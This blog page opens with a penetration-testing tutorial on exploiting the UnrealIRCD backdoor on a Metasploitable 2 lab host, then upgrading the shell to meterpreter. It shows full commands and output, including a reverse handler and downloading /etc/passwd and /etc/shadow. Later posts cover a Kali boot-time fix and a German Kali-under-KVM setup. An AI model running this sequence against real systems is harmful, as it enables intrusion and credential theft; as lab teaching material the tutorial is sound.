Penetration testing: Kali, Metasploit, upgrade of a session to meterpreter

Recently, I started reading in the German book of E. Amberg and D. Schmid on “Hacking” (see the full reference at this post’s end). This is a book with over 1000 pages and it documents the effort of the authors to give a full overview over the wide spectrum of terms used in pen-test and hacking environments, steps of penetration testing, attack variants, tools, defense options, and, and …. . Well, it provides a really broad overview, but in contrast to some other more focused books it is not a real teaching book on penetration testing – in my opinion.

However, at some points the authors describe introductory examples, also simple exploits which can be tested e.g. on targets like Metasploitable 2 or 3 or on prepared Windows systems. This post was inspired by a chapter of the authors about “meterpreter” which they introduced after an exploitation example, i.e. in a post exploitation phase. The chapter deserves some additional hints, small, but hopefully useful for beginners.

Disclaimer:
All the information given in this post is for educational purposes and addresses people interested in and starting with penetration testing. It partially refers to information on the Metasploit Framework [MSF] and Metasploitable targets published in different form elsewhere. Book references are given at the end of this post. If you test out the examples given below, only do this in environments for which the owners and the administrators of the affected networks and systems have given you explicit written consent to install, isolate and use systems with MSF and a Metasploitable target system. Cooperate with the administrators to configure respective network segments and firewalls. Never expose a Metasploitable system to the Internet.

Exploits and shells

During pen-testing (always with the consent of your customer and system administrator) you may not only be requested to find vulnerabilities, but also to verify that an attacker really could exploit them. So – again with the explicit consent of your customer and after a solid risk estimation for the systems and networks under investigation – you may start exploits, e.g with the help of the Metasploit framework [MSF]. Your first objective then – for convenience reasons, but also for obfuscation reasons – is probably to work with a meterpreter shell, which indeed offers a variety of very convenient commands for a post exploitation phase. Often exploits offered by the MSF will not give you a chance to transfer meterpreter as a payload, but only simple interaction shells.

To replace a basic command shell of an achieved session on an attacked target with meterpreter actually is a basic move within MSF, but you may have to take care of some steps ahead. In the named book the authors mention a specific method, namely to upgrade an existing “session” to a meterpreter session.

Upgrade of a plaintext command shell with “sessions -u

The named authors perform the following attack steps to get a session on a Metasploitable target:

  1. They use the exploit DistCC from a Kali host and get a command shell.
  2. They use an additional exploit for a privilege escalation to get root rights and to open a reverse shell to the attacking host; they provide the IP address of the Kali host and a listener port there as parameters of the exploit. They then prepare a suitable executable of the exploit and install it on the attack’s target host (i.e. the Metasploitable system).
  3. They start a listener (with “exploit/multi/handler”) on the Kali host. During this step they set the IP-address of the Kali host and the port there to be addressed by the reverse connection later on.
  4. They start the deployed
    secondary exploit on the attack target. Immediately afterward they get a session with a basic shell with MSF on the attacking Kali system.
  5. They list up the open sessions by “sessions -l” and get the session’s ID – e.g. 2.
  6. They upgrade the session to a meterpreter session with “sessions -u SESSION_ID“. SESSION_ID has to be replaced by the session ID. In the example: “sessions -u 2”.

So far, so good. Works perfectly – at least after this specific succession of steps.

Interestingly enough Rapid7 in its documentation on the (expensive) Metasploit Pro does not discuss the command line option “sessions -u” to upgrade a sessoin – Rapid 7 only presents the option to start a meterpreter shell via the “available actions” on the graphical interface of MSF Pro. Probably the interface does nothing else than our CLI command ….

https://docs.rapid7.com/metasploit/manage-meterpreter-and-shell-sessions

Note that Sparc Flow in his book “Hack like a Pornstar” uses a different way in his example of attacking a Linux server. He manually prepares a meterpreter executable (with the help of “veil”) and places it on the attacked host and starts it there. Maybe more realistic. MSF in the above example transfers meterpreter components to the attacked host as a part of the last step.

Now, a beginner to metasploit may try to repeat something similar with a different basic exploit and may fail with the session upgrade. Why?

Think about firewalls – both remote and local

A trivial point might be a firewall- somewhere …
As a pen-tester you probably want to protect your own systems during tests – also when you are at a customer’s site. (You may find some guys there who try to fiddle with you during your tests.) Your Kali will run on an isolated virtual machine or special live system on some laptop. You may have some routing and a local firewall in place on your Linux host system which controls the communication to your Kali (guest) system. But also the attacked host may reside behind a firewall (e.g. of a network segment). So, you have to carefully think about which ports to use for reverse shells. This is a basic first point where real examples may differ from the idealized world in books. I recommend to train quick reconfigurations of your own firewalls – and watch their actions via “tail” during pen-tests.
Actually, if did not have to think about firewalls and the example given by the named authors worked as described without problems this is the first indication that the network and systems on it are not well managed or that you yourself are not well prepared.

Is meterpreter an optional payload of all exploits available in MSF?

Some other textbooks introduce meterpreter as a direct payload of an exploit used within MSF. One example is M. Messner’s book on Metasploit. However, many exploits available in MSF do not give you this chance. Book examples typically do and can not cover all situations. So, one should be familiar with some way of upgrading a session … Let us look at an example with “Metasploitable 2” as a target system.

Example – IRC exploit on Metasploitable 2

Lets try a specific attack from a Kali system against a Metasploitable 2 target. Each host resides in an (isolated) LAN segment.
As I have performed this attack before I already have a respective vulnerability entry in the database tables of my MSF workspace:

msf6 > vulns

Vulnerabilities
===============

Timestamp                Host           Name                                           References
---------                ----           ----                                           ----------
...
...
2020-11-26 17:15:14 
UTC  172.16.40.121  UnrealIRCD 3.2.8.1 Backdoor Command Execution  CVE-2010-2075,OSVDB-65445,URL-http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
2020-11-26 17:34:31 UTC  172.16.40.121  VSFTPD v2.3.4 Backdoor Command Execution       OSVDB-73573,URL-http://pastebin.com/AetT9sS5,URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
2020-11-26 17:44:45 UTC  172.16.40.121  Generic Payload Handler    
...

Ok, let MSF do its work:

Infos about the exploit:

msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor 
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > info

       Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
     Module: exploit/unix/irc/unreal_ircd_3281_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-06-12

Provided by:
  hdm <x@hdm.io>

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   6667             yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a malicious backdoor that was added to the 
  Unreal IRCD 3.2.8.1 download archive. This backdoor was present in 
  the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 
  2010.

References:
  https://cvedetails.com/cve/CVE-2010-2075/
  OSVDB (65445)
  http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt

Here we see already that this exploit does not provide much space for action on the target system. There are not many option either:

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

OK, does it have a “check” option?

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOST 172.16.40.121
RHOST => 172.16.40.121
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > check
[-] Check failed: NoMethodError This module does not support check.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > 

What payloads are available?

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   0   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   cmd/
unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   10  cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   11  cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

No meterpreter there. OK, a normal shell then …

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl

Further options?

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.40.121    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)


Payload options (cmd/unix/bind_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.16.40.121    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Do not getconfused by the LPORT setting. In this case it means the listening port at the attacked site – not on our local Kali host. Do our firewalls allow for packets to port 4444 on the target? Yes, OK, then we run the exploit:

Using the exploit:

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] 172.16.30.129:6667 - Connected to 172.16.40.121:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] 172.16.30.129:6667 - Sending backdoor command...
[*] Started bind TCP handler against 172.16.40.121:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 172.16.40.121:4444) at 2020-11-28 14:04:02 +0100

The interesting line is the last one, no IP address of our own attacking host appears. However, netstat on the Kali host reveals:

netstat -an | grep 4444
tcp        0      0 192.168.77.22:46705     172.16.40.121:4444      VERBUNDEN  

Our exploit setup a TCP listener on port 4444 on the target and we connected with a command shell. We should be able to see this from our shell; we just type at the blinking cursor in Metasploit:

    

whoami
root
netstat -an | grep 4444
tcp        0      0 172.16.40.121:4444      192.168.77.22:46705     ESTABLISHED

Well, we became root even with this backdoor exploit. But this is only a side remark.

Now, let us use the recipe from the “Hacking”-book authors:
We press the “CTRL-Z” key combination to put our session to the background and get an option to issue further commands at the metasploit prompt:

Background session 1? [y/N]  y
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               0.0.0.0:0 -> 172.16.40.121:4444 (172.16.40.121)
  

The command “sessions” revealed a session ID to us. Now, we use the exploit shell_to_meterpreter.

Apply “shell_to_meterpreter” and “multi/handler” indirectly via ”
sessions -u”

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 0.0.0.0:4433 
[*] Command stager progress: 100.00% (769/769 bytes)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               0.0.0.0:0 -> 172.16.30.129:4444 (172.16.30.129)

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > 

We had expected a new meterpreter session. But nothing happens. After some time we even get a message that the started handler was stopped:

[*] Stopping exploit/multi/handler

So, what is wrong?

The manual way to upgrade to meterpreter …

When we compare our exploit to the one discussed by the authors of the “Hacking”-book we see some differences:

The authors used a reverse shell payload. At some point they specified the IP address of the attacking host, i.e. of our Kali system. In their case the “sessions” command displayed a session which explicitly contained the IP-address of the local attacker host, i.e. of the Kali system.

Hmm. We doubt that meterpreter needs an already existing reverse shell established. Reading a bit we understand that meterpreter works as staged program. Things get uploaded in pieces via an established shell to the target’s TCP handler and from there into the target’s RAM.

But what if the meterpreter piece on the target requires the IP of the host because it wants to connect to the host, i.e. built its own reverse connection from the point of the view of the attacker? And what if this is taken wrongly from the running session? Or what if a local listener on the attacking Kali host is established with a wrong IP address? Then we expect problems!

Even if we later on establish a session from the Kali host to the target the uploaded and RAM-established meterpreter part on the target needs to tell the attacking host which port it will use on the target! Thus, the communication setup on both hosts must work correctly!

Let us see. There is a manual “exploit” module and command to establish meterpreter. It is even mentioned by the authors of the “Hacking”-book, but they do not elaborate on it: “/post/multi/manage/shell_to_meterpreter“.
We saw a line about it in the output of “sessions -u”, too. Ok, let us use it:

Direct use of shell to meterpreter

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > use post/multi/manage/shell_to_meterpreter 
msf6 post(multi/manage/shell_to_meterpreter) > info

       Name: Shell to Meterpreter Upgrade
     Module: post/multi/manage/shell_to_meterpreter
   Platform: Linux, OSX, Unix, Solaris, BSD, Windows
       Arch: 
       Rank: Normal

Provided by:
  Tom Sellers <tom@fadedcode.net>

Compatible session types:
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
  LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
  LPORT    4433             yes       Port for payload to connect to.
  SESSION                   yes       The session to run this module on.

Description:
  This module attempts to upgrade a command shell to meterpreter. The 
  shell platform is automatically detected and the best version of 
  meterpreter for the target is selected. Currently 
  
meterpreter/reverse_tcp is used on Windows and Linux, with 
  'python/meterpreter/reverse_tcp' used on all others.

We see that indeed reverse TCP handlers are established – meterpreter on the target will want to connect back to us. It starts a handler for it. And we have to provide suitable options:

msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

Ok, we decide for a local port 8090 – and open it on firewalls. We set the relevant options:

post(multi/manage/shell_to_meterpreter) > set LHOST 192.168.77.22
LHOST => 192.168.77.22
msf6 post(multi/manage/shell_to_meterpreter) > set LPORT 8090
LPORT => 8090
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1

Successful session upgrade

msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.77.22:8090 
[*] Sending stage (976712 bytes) to 172.16.40.121
[*] Meterpreter session 2 opened (192.168.77.22:8090 -> 172.16.40.121:53847) at 2020-11-28 15:55:06 +0100
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                                       Connection
  --  ----  ----                   -----------                                                                       ----------
  1         shell cmd/unix                                                                                           0.0.0.0:0 -> 172 .16.40.121:4444 (172.16.40.121)
  2         meterpreter x86/linux  root @ metasploitable (uid=0, gid=0, euid=0, egid=0) @ metasploitable.localdo...  192.168.77.22:8090 -> 172.16.40.121:53847 (172.16.40.121)

Success! On our Kali host netstat reveals:

Aktive Internetverbindungen (Server und stehende Verbindungen)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
...
tcp        0      0 192.168.77.22:8090      172.16.40.121:53847     VERBUNDEN  
tcp        0      0 192.168.77.22:46705     172.16.40.121:4444      VERBUNDEN  
...

Let us use session 1 first:

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 1
[*] Starting interaction with 1...

netstat -an | grep 4444 
tcp        0      0 172.16.30.129:4444      192.168.10.12:46705     ESTABLISHED
netstat -an | grep 8090
tcp        0      0 172.16.30.129:53847     192.168.10.12:8090      ESTABLISHED

Now we press the key combination “Ctrl-Z“, again, and switch to session 2 by using “sessions -i” (the “i” stands for “interaction”):

Background session 1? [y/N]  y
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > pwd
/etc/unreal
meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > lcd /root
meterpreter > lpwd
/root
meterpreter > 
getlwd
/root
meterpreter > download /etc/passwd ./metasploitable2
[*] Downloading: /etc/passwd -> ./metasploitable2/passwd
[*] Downloaded 1.54 KiB of 1.54 KiB (100.0%): /etc/passwd -> ./metasploitable2/passwd
[*] download   : /etc/passwd -> ./metasploitable2/passwd
meterpreter > download /etc/shadow ./metasploitable2
[*] Downloading: /etc/shadow -> ./metasploitable2/shadow
[*] Downloaded 1.18 KiB of 1.18 KiB (100.0%): /etc/shadow -> ./metasploitable2/shadow
[*] download   : /etc/shadow -> ./metasploitable2/shadow
meterpreter > route

IPv4 network routes
===================

    Subnet       Netmask        Gateway      Metric  Interface
    ------       -------        -------      ------  ---------
    0.0.0.0      0.0.0.0        172.16.40.1  100     eth0
    172.16.40.0  255.255.255.0  0.0.0.0      0       eth0

No IPv6 routes were found.

The system is yours, now. As an example, we have downloaded the password files from the Metasploitable system to a prepared local directory for later analysis.

Enough for today. Let us kill all sessions after a “Ctrl-Z”:

Background session 2? [y/N]  
msf6 post(multi/manage/shell_to_meterpreter) > sessions -K
[*] Killing all sessions...
[*] 172.16.30.129 - Command shell session 1 closed.
[*] 172.16.30.129 - Meterpreter session 2 closed.

What was the reason for the failure in the first trial with “sessions -u”?

You can repeat out first attack and start “sessions -u”. You have some time until the multi-handler gets stopped again. During this time you can check communication packets with wireshark at network interfaces of the hosts. And you can have a look with netstat at listeners and ports on the hosts. You will find that packets from the targetto the Kali host are addressed correctly. But a look with netstat on the Kali host reveals:

...
tcp        0      0 0.0.0.0:4433            0.0.0.0:*              LISTEN    
tcp        0      0 192.168.77.22:44909     172.16.40.121:4444      VERBUNDEN  
...

In case of the working solution we find in contrast:

....
tcp        0      0 192.168.77.22:44909     172.16.40.121:4444      VERBUNDEN  
tcp        0      0 192.168.77.22:4433      172.16.40.121:46660     LISTEN   
...

and then

tcp        0      0 192.168.77.22:4433      172.16.40.121:46660     VERBUNDEN 

So, the handler for the reverse connection on the Kali host caused the problem: It took the default IP 0.0.0.0 from the original session which only had to establish a forward direction.

Conclusion

During our experiments we saw that some simple text book examples do not always work. It depends on the exploits, the handlers, the required parameters for communication settings, …. Upgrading an existing basic shell session (connected to a compromised target host) to a meterpreter session will not always work with “sessions -u”.

The success of “sessions -u” depends on the original exploit options and their payloads. Some exploit/payload combinations do not require a LHOST IP address. They do not set up a reverse connection. Instead 0.0.0.0:0 may appear after the exploit in the local MSF session overview. Then “sessions -u” will fail. Metasploit is not perfect ….

In such cases it is good to know that you can use and configure “post/multi/manage/shell_to_meterpreter” manually. In most cases this lead to a successful upgrade of an existing session to meterpreter where “sessions -u” failed.

Book references

“Hacking – Der umfassende Praxis-Guide”, Fritz Amberg, Daniel Schmidt, 2020, mitp Verlags GmbH & Co KG, Frechen

“How to … Hack like a Pornstar”, Sparc Flow, 2017, ISBN 978-1-5204-7851-7

“Metasploit- Das Handbuch zum Penetration-Testing-Framework”, M. Messner, 2012, dpunkt.
verlag GmbH, Heidelberg

 

Long boot time of Kali Linux after swap partition changes – swap settings for the initramfs

Recently, I reactivated an old KVM-based installation of Kali Linux from 2018. So, some hurdles to upgrade the Kali distribution to version 2020.4 had to be overcome. Actually, it was a mess. I had to solve multiple circle like problems with package dependencies (Python3, Ruby, special packages in the Discovery section, …). Sometimes I had to delete packages explicitly. The new Kali minimum installation and its enhancement via meta-packages contributed to the problems. In the end I also reinstalled a the Gnome desktop environment – supplemented by a few KDE applications. Now, my Kali was fully functional again. However, the remaining disk space had shrunk …

Resizing the qcow2-file for the virtual disk of the virtual machine for Kali Linux

During all the back and forth with installing meta-packages I came close to exhausting virtual disk space, before I could clean up and remove packages again (with “apt-get autoclean” and “apt-get autoremove”). The virtual hard disk was a qcow2-file in my case. For further experiments I had to expand its capacity. This could easily be done by

qemu-img resize PATH_TO_qcow2_FILE +NG

where I had to chose a suitable “N” (20). The extended file must, of course, still fit into its filesystem on the KVM host!

Extending and rearranging partitions within the Kali system

The more difficult part in my case was the rearrangement of the two partitions ( one for the “/”-fs and one for swap) on the virtual disk for my Kali guest system. I did this within the running Kali system. Bad habit; such operations are dangerous, of course, but I trusted in the abilities of gparted. An extension of a mounted “ext4”-formatted partition is in my experience no major problem as long as there is enough free space behind its current location …. But, I recommend, of course, to make a backups of your virtual machine, before you start with any potentially dangerous operations regarding the file-systems of your Linux machines.

As my old Kali installation unfortunately did not have a LVM-layout and the disk partition table was of the old MS-DOS type, I actually had to move a blocking swap partition which was located directly after the “/”-partition. Meaning: I had to delete and later recreate it at a different position. Of course, after having disabled the swap in the running Kali guest :-). The partition keeping the “/”-filesystem (ext4) could then be extended without any problems on the running system. The new swap partition afterwards got its place behind the “/”-partition. According to “gparted” everything was OK after the partition changes: Then I rebooted…

The problem: A boot time of almost 30 secs …

The next restart took about 28 secs! But the machine came up in the end – which is almost a wonder, after I understood the cause of the problem. A standard boot-process until login normally required about 4 secs, only, before my filesystem changes. A major discrepancy and a clear indications of a major problem! Looking at the “dmesg”-output I got the impression that the delay had to do with operations occurring at the very beginning of the boot process. So, I checked the “/etc/fstab”. And got a first glimpse of the cause: The entries there referred to the UUIDs of the partitions! Not unexpectedly – this is the standard these days for almost all major distributions.

So, stupid me: Of course, the UUID of the swap partition had changed during the mentioned operations! I adapted it to the new value (which I got from gparted). I also checked whether there was
any reference to the swap-partition in the Grub command line (check “/etc/default/grub” for a “resume”-parameter!) To be on the safe side I also checked the result of “update-grub” in the file “/boot/grub/grub.cfg”). I did not find any references there. So, I gladly restarted my Kali system. However, the problem had not disappeared … .

Solution: The initramfs-configuration includes an explicit setting for the swap-partition!

Now, at this point there were not many options left. I started suspecting that the initramfs had a wrong entry. Now, where do we find options regarding the swap for the initramfs on a Debian based systems? A bit of duckduckgoing pointed me to the file

/etc/initramfs-tools/conf.d/resume

And there I did find an entry like

RESUME=UUID=d222524c-5add-2fcf-82dd-4d1b7e528d0c

OK – I changed it to the new value. Then I used

update-initramfs -u

to update the initramfs. And, guess what: The problem disappeared! I got my 4 secs of boot time again.

Conclusion

Never forget to check the UUID-settings for partitions after major changes of the filesystem-layout on your disks. Do the necessary checks not only on real host systems, but also on virtualized systems. Check both the “/etc/fstab” AND the Grub2-configuration AND the initramfs-configuration for possible references to changed or moved partitions.

Off topic – but related: When copying the contents of a partition with “dd” into another partition on your hard disk, e.g. for a backup, you should also care about the fact that you have two partitions with the same UUID afterwards. This may lead to major problems for any active Grub2. Always change the UUID of the copied partition with tune2fs before any reboots. If the copied partition was a bootable one, you also take care of its “/etc/fstab”-entries and initramfs settings, if you want it to be bootable in its new place.

General warning: Whenever you move/copy partitions, write down and save the original UUIDs – you may need them in case of trouble.

 

Erste Erfahrungen mit Kali Linux 2.0 unter KVM/qemu auf einem Opensuse 13.2 Host

Ich muss mich in näherer Zukunft aus beruflichen Gründen stärker mit Penetration-Testing und IT-Forensic beschäftigen. Um bestimmte Szenarien nachzustellen, bedarf es einer virtuellen Übungsumgebung. Dabei liegt es u.a. nahe, Kali 2.0 auf einem virtualisierten Gastsystems zu nutzen.

Die von mir inzwischen bevorzugte Virtualisierungsumgebung für Linux-Gastsysteme auf einem Virtualisierungshost ist KVM/qemu mit virt-manager/libvirt als Frontend-Gespann. Da ich vorab von etlichen Problemen zu zu Kali 1.0, aber auch Kali 2.0 in normalen und virtuellen Umgebungen gelesen hatte, war ich etwas gespannt, was auf einem Opensuse-13.2-Host im Zuge einer KVM-Installation von Kali 2.0 alles an Ungemach auf mich zukommen würde.

Ich kann nach nunmehr ein paar Wochen Benutzung zusammenfassend nur sagen: Es gibt praktisch keine ernsthaften Probleme.

Die Installation über ein ISO-Image läuft auf Opensuse 13.2-Plattformen mit i7-Prozessor, SSD, Nvidia-Graka (mit propr. Treiber) bzw. Laptop mit Optimus-Grafik problemfrei. Ich habe inzwischen mehrere Installationen auf verschiedenen Systemen (PC, Laptops mit Optimus) mit Hilfe von “virt-manager” durchgeführt, ohne mich mit etwas Gravierendem auseinandersetzen zu müssen. (Virtualisierungsprofis werden natürlich eher auf XML-Konfigurationsdateien oder explizite Kommandos/Scripts zurückgreifen. Das ist aber sekundär.) Wichtig ist, dass der Host aktualisiert ist und die KVM-Virtualisierungsumgebung vorab auf Funktionstüchtigkeit getestet wurde.

kali_install_800

Ich erlaube mir, im Vorgriff auf weitere Artikel an dieser Stelle ein paar hoffentlich hilfreiche Hinweise zu geben:

  • RPM-Pakete zu KVM, libvirt/virt-manager:
    Ich habe die KVM/qemu/libvirt-Pakete der Opensuse 13.2-Standard-Repositories und nicht die brandaktuellen Pakete des Opensuse-libvirt-Repositories verwendet.
  • Video-Konfiguration des Gastsystems:
    Man wähle bei der Konfiguration des Gastes in jedem Fall ein Spice-Display mit einem virtuellem Video-Interface “Video QXL”. Für virtuelle Platten nehme man “debianwheezy.qcow2”-Devices mit virtio-Treiber. Auch die virtuellen NICs sollten mit virtio-Treibern unterfüttert werden.
  • Änderung virtuelle Bildschirmgröße:
    Änderungen der virtuellen Bildschirmgröße für das Gnome-X-Display kann man über den Punkt “Anwendungen” in der linken Gnome-Leiste, die Anwendung “Einstellungen” >> Monitore” sehr bequem vornehmen. Die grafische Interaktion über Spice läuft auf meinem System sehr flüssig. Da haben die Entwickler hinter Spice in den letzten 2 Jahren wirklich großartige Arbeit geleistet.
  • SSH-Zugang vom Host:
    Ist einem Spice (entgegen meiner eigenen Erfahrung) zu träge, so kann man natürlich auch über “ssh -X” auf der virtuellen Maschine arbeiten. Wenn man das tut, sollte man sich vorab ernsthaft Gedanken über die Isolierung des KVM-Gastes während Penetration-Experimenten in seinen virtuellen Netzen machen. Ich nutze für den Zugang zum Kali-Gast meist ein von anderen virtuellen Bridges separates Host-Only-Netzwerk, dessen HOST-Interface von evtl. Routing auf dem Host per Paketfilter (netfilter mit iptables/ebtables) explizit ausgeschlossen ist. Stattet man das Kali-Gastsystem mit mehreren virtuellen NICs aus, sollte dort aus Sicherheitsgründen während Penetrationstest-Übungen in virtuellen Netzen kein
    Routing aktiviert sein.
  • “Gnome Control Center”-Zugang?

    Für Gnome-Ungewohnte: Viele System- und Desktop-Einstellungen erreicht man über das sog. “Gnome Control Center”, was man von der Kommandozeile eines Terminals mittels

    mykali~: # gnome-control-center &

    starten kann.
    Der Aufruf funktioniert allerdings nur lokal innerhalb des Spice-Displays. Er funktioniert nicht über eine SSH-Shell vom Host aus. Es wird ein X-Window-Fehler angezeigt – und zwar erstaunlicherweise aus dem glx-Bereich – offenbar wird am Display ein glx-fähiger Renderer erkannt. Ähnliche Fehler gab es übrigens unter Debian und Ubuntu schon früher bei VNC- und X2go-Verbindungen. Man musste damals GL-X und OpenGL-Fähigkeiten des Remote Displays explizit abschalten. Offenbar liegt nun ein ähnliches Problem vor.
    Es funktioniert leider auch nicht nach einem

    export LIBGL_ALWAYS_INDIRECT=y

    auf dem Kali Gast.
    Keine Ahnung. Schlichter Anwendungs-Bug? Irgendwelche Inkompatibilitäten zwischen dem MESA/libGL-Bibliotheken unter Debian und dem 3D-Nvidia-Treiber Setup auf dem Opensuse-Host? [glxheads läuft – und nach einer Installation von VirtualGL auch glxspheres; glxinfo zeigt vernünftige Meldungen. Warum das “gnome-control-center” überhaupt libGL-Ahängigkeiten auflösen muss, entzieht sich meinem Verständnis. Genauer: Warum machen die Gnome-Entwickler ein so zentrales Ding vom Erkennen eines glx-fähigen Displays und spezifischen Reaktionen darauf abhängig?] Das Thema ist mir im Moment zu aufwändig und auch zu kniffelig; das Problem schränkt aber die eigentliche Arbeit mit Kali in der virtuellen Umgebung nicht wirklich ein.

    Übrigens: Für Änderungen der Netzwerk-Einstellungen – was ggf. häufiger benötigt wird – steht auf einer SSH-Konsole auch der Befehl

    nm-connection-editor

    zur Verfügung, der ein geeignetes grafisches Interface für “NetworkManager” öffnet.

  • apt-get-Konfiguration
    Lediglich die “apt-get”-Konfiguration ist nach der Installation evtl. anzupassen, je nachdem welche Optionen man bzgl. des Update-Verhaltens während der Installation gewählt hat oder wählen konnte. Letztlich sollte die Datei “/etc/apt/sources.list” folgende Einträge enthalten:

    mykali2:~# cat /etc/apt/sources.list
    deb http://http.kali.org/kali/ sana main contrib non-free
    deb-src http://http.kali.org/kali/ sana main contrib non-free
     
    deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
    deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free

    Auf dieser Grundlage sollte man nach der Installation unbedingt die Sequenz

    mykali:~# apt-get clean
    mykali:~# apt-get update
    mykali:~# apt-get upgrade

    ausführen lassen. Wichtig für eine einwandfreies Starten von “armitage” als Metasploit-Frontend und auch für einen funktionierenden JtR.

  • Bei evtl. Problemen mit einem Armitage-Start:
    Armitage ist ein wichtiges teilgrafisches Frontend für eine Reihe von Tools, u.a. Metasploit. Es sollte neben der “msf-console” lauffähig sein. Dazu sind ein paar Voraussetzungen erforderlich. Wie im letzten Punkt beschrieben, sind zunächst Updates und Upgrades mittels apt-get durchzuführen. Vor dem “armitage”-Start muss zudem die Postgre-Datenbank laufen. Dazu:

    mykali:~# /etc/init.d/postgresql start
    [ ok ] Starting postgresql (via systemctl): postgresql.service.

    Achtung: Der
